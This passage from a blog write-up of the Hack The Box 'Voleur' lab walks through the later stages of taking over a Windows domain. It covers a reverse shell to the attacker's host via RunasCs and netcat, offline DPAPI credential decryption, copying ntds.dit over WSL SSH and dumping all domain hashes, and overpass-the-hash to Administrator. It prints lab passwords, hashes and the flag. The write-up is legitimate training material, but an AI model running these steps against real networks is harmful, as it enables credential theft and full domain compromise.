PS C:\Windows\system32> Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'
Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'
PS C:\Windows\system32>

Todd's password from the spreadsheet works for the restored account, so the same RunasCs trick gives us a shell as him:

*Evil-WinRM* PS C:\Users\svc_winrm\Documents> ./r.exe Todd.Wolfe NightT1meP1dg3on14 powershell.exe -r 10.10.16.11:
[*] Warning: The logon for user 'Todd.Wolfe' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-1e701f$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4980 created in background.
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>
┌──(kali㉿kali)-[~/Desktop]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.11.76] 59252
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
voleur\todd.wolfe
PS C:\Windows\system32>

DPAPI Abuse

Todd's old profile is archived under C:\IT\Second-Line Support\Archived Users\todd.wolfe, and two DPAPI artifacts in it matter: the user master key file under AppData\Roaming\Microsoft\Protect\<SID>\<GUID> and the credential blob under AppData\Roaming\Microsoft\Credentials. The master key is encrypted with a key derived from the user's password and SID, so with Todd's password we can decrypt it offline and then use it to decrypt the credential blob (without the password, the domain DPAPI backup key from the DC would do the same job). Copy both files to C:\temp and pull them down through evil-winrm:

PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\credentials> ls
ls


Directory: C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\credentials


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/29/2025 4:55 AM 398 772275FAD58525253490A9B0039791D3


PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\credentials> cd ../protect;get-childitem -force
cd ../protect;get-childitem -force


Directory: C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\protect


Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 1/29/2025 7:13 AM S-1-5-21-3927696377-1337352550-2781715495-1110
-a-hs- 1/29/2025 4:53 AM 24 CREDHIST
-a-hs- 1/29/2025 4:53 AM 76 SYNCHIST


PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\protect>
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\protect\S-1-5-21-3927696377-1337352550-2781715495-1110> cp "08949382-134f-4c63-b93c-ce52efc0aa88" c:/temp
cp "08949382-134f-4c63-b93c-ce52efc0aa88" c:/temp
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\protect\S-1-5-21-3927696377-1337352550-2781715495-1110> cd ../../credentials
cd ../../credentials
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\credentials> cp "772275FAD58525253490A9B0039791D3" c:/temp
cp "772275FAD58525253490A9B0039791D3" c:/temp
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\credentials>
*Evil-WinRM* PS C:\temp> download 772275FAD58525253490A9B0039791D3

Info: Downloading C:\temp\772275FAD58525253490A9B0039791D3 to 772275FAD58525253490A9B0039791D3

Info: Download successful!

*Evil-WinRM* PS C:\temp> download 08949382-134f-4c63-b93c-ce52efc0aa88

Info: Downloading C:\temp\08949382-134f-4c63-b93c-ce52efc0aa88 to 08949382-134f-4c63-b93c-ce52efc0aa88

Info: Download successful!
┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password 'NightT1meP1dg3on14' -sid S-1-5-21-3927696377-1337352550-2781715495-1110
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version : 2 (2)
Guid : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ impacket-dpapi credential -f 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19+00:00
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m

The blob holds jeremy.combs's password (qT3V9pLXyN7W4m), so the same RunasCs reverse shell makes us jeremy:

┌──(kali㉿kali)-[~/Desktop]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.11.76] 49166
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
voleur\jeremy.combs

Jeremy can read the Third-Line Support folder, which holds a Backups directory, an SSH private key and a note from the admin:

PS C:\it\third-line support> ls
ls


Directory: C:\it\third-line support


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/30/2025 8:11 AM Backups
-a---- 1/30/2025 8:10 AM 2602 id_rsa
-a---- 1/30/2025 8:07 AM 186 Note.txt.txt
PS C:\it\third-line support> cat Note.txt.txt
cat Note.txt.txt
Jeremy,

I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.

Please see what you can set up.

Thanks,

Admin

The note, the id_rsa and the OpenSSH-for-Ubuntu on port 2222 fit together: WSL is running on the DC with an SSH server, and /mnt/c exposes the whole Windows C: drive to whoever logs in there. The key lets us scp the backup, ntds.dit plus the SYSTEM hive (the hive carries the boot key needed to decrypt the database), to our machine, where secretsdump.py extracts every NT hash and Kerberos key offline:

┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ scp -i id_rsa -P 2222 -r "[email protected]:/mnt/c/IT/Third-Line Support/Backups" ./
ntds.dit 100% 24MB 94.0KB/s 04:21
ntds.jfm 100% 16KB 9.0KB/s 00:01
SECURITY 100% 32KB 5.3KB/s 00:06
SYSTEM 100% 18MB 127.5KB/s 02:20
┌──(kali㉿kali)-[~/targetedKerberoast/Backups/Active Directory]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::
voleur.htb\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::
voleur.htb\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::
voleur.htb\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::
voleur.htb\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::
voleur.htb\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e37717757433b4780079ee9b1d421:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:f577668d58955ab962be9a489c032f06d84f3b66cc05de37716cac917acbeebb
Administrator:aes128-cts-hmac-sha1-96:38af4c8667c90d19b286c7af861b10cc
Administrator:des-cbc-md5:459d836b9edcd6b0
DC$:aes256-cts-hmac-sha1-96:65d713fde9ec5e1b1fd9144ebddb43221123c44e00c9dacd8bfc2cc7b00908b7
DC$:aes128-cts-hmac-sha1-96:fa76ee3b2757db16b99ffa087f451782
DC$:des-cbc-md5:64e05b6d1abff1c8
krbtgt:aes256-cts-hmac-sha1-96:2500eceb45dd5d23a2e98487ae528beb0b6f3712f243eeb0134e7d0b5b25b145
krbtgt:aes128-cts-hmac-sha1-96:04e5e22b0af794abb2402c97d535c211
krbtgt:des-cbc-md5:34ae31d073f86d20
voleur.htb\ryan.naylor:aes256-cts-hmac-sha1-96:0923b1bd1e31a3e62bb3a55c74743ae76d27b296220b6899073cc457191fdc74
voleur.htb\ryan.naylor:aes128-cts-hmac-sha1-96:6417577cdfc92003ade09833a87aa2d1
voleur.htb\ryan.naylor:des-cbc-md5:4376f7917a197a5b
voleur.htb\marie.bryant:aes256-cts-hmac-sha1-96:d8cb903cf9da9edd3f7b98cfcdb3d36fc3b5ad8f6f85ba816cc05e8b8795b15d
voleur.htb\marie.bryant:aes128-cts-hmac-sha1-96:a65a1d9383e664e82f74835d5953410f
voleur.htb\marie.bryant:des-cbc-md5:cdf1492604d3a220
voleur.htb\lacey.miller:aes256-cts-hmac-sha1-96:1b71b8173a25092bcd772f41d3a87aec938b319d6168c60fd433be52ee1ad9e9
voleur.htb\lacey.miller:aes128-cts-hmac-sha1-96:aa4ac73ae6f67d1ab538addadef53066
voleur.htb\lacey.miller:des-cbc-md5:6eef922076ba7675
voleur.htb\svc_ldap:aes256-cts-hmac-sha1-96:2f1281f5992200abb7adad44a91fa06e91185adda6d18bac73cbf0b8dfaa5910
voleur.htb\svc_ldap:aes128-cts-hmac-sha1-96:7841f6f3e4fe9fdff6ba8c36e8edb69f
voleur.htb\svc_ldap:des-cbc-md5:1ab0fbfeeaef5776
voleur.htb\svc_backup:aes256-cts-hmac-sha1-96:c0e9b919f92f8d14a7948bf3054a7988d6d01324813a69181cc44bb5d409786f
voleur.htb\svc_backup:aes128-cts-hmac-sha1-96:d6e19577c07b71eb8de65ec051cf4ddd
voleur.htb\svc_backup:des-cbc-md5:7ab513f8ab7f765e
voleur.htb\svc_iis:aes256-cts-hmac-sha1-96:77f1ce6c111fb2e712d814cdf8023f4e9c168841a706acacbaff4c4ecc772258
voleur.htb\svc_iis:aes128-cts-hmac-sha1-96:265363402ca1d4c6bd230f67137c1395
voleur.htb\svc_iis:des-cbc-md5:70ce25431c577f92
voleur.htb\jeremy.combs:aes256-cts-hmac-sha1-96:8bbb5ef576ea115a5d36348f7aa1a5e4ea70f7e74cd77c07aee3e9760557baa0
voleur.htb\jeremy.combs:aes128-cts-hmac-sha1-96:b70ef221c7ea1b59a4cfca2d857f8a27
voleur.htb\jeremy.combs:des-cbc-md5:192f702abff75257
voleur.htb\svc_winrm:aes256-cts-hmac-sha1-96:6285ca8b7770d08d625e437ee8a4e7ee6994eccc579276a24387470eaddce114
voleur.htb\svc_winrm:aes128-cts-hmac-sha1-96:f21998eb094707a8a3bac122cb80b831
voleur.htb\svc_winrm:des-cbc-md5:32b61fb92a7010ab
[*] Cleaning up...

Finally, the Administrator NT hash. With NTLM disabled a classic pass-the-hash over SMB or WinRM won't work, so instead we request a TGT with the hash (overpass-the-hash) and log in over Kerberos to read the root flag:

┌──(kali㉿kali)-[~/targetedKerberoast/Backups/Active Directory]
└─$ impacket-getTGT -hashes aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2 'voleur.HTB/administrator'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in administrator.ccache

┌──(kali㉿kali)-[~/targetedKerberoast/Backups/Active Directory]
└─$ export KRB5CCNAME=administrator.ccache

┌──(kali㉿kali)-[~/targetedKerberoast/Backups/Active Directory]
└─$ evil-winrm -i dc.voleur.htb -r voleur.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../desktop/root.txt
bec901f7785188b4f4209aa8372657dd
*Evil-WinRM* PS C:\Users\Administrator\Documents>

That was it for Voleur, hope you learned something new!
-0xkujen

  • Title: Hackthebox: Voleur
  • Author: Foued SAIDI
  • Created at : 2025-11-01 12:28:42
  • Updated at : 2025-11-01 14:04:29
  • Link: https://kujen5.github.io/2025/11/01/Hackthebox-Voleur/
  • License: This work is licensed under CC BY-NC-SA 4.0.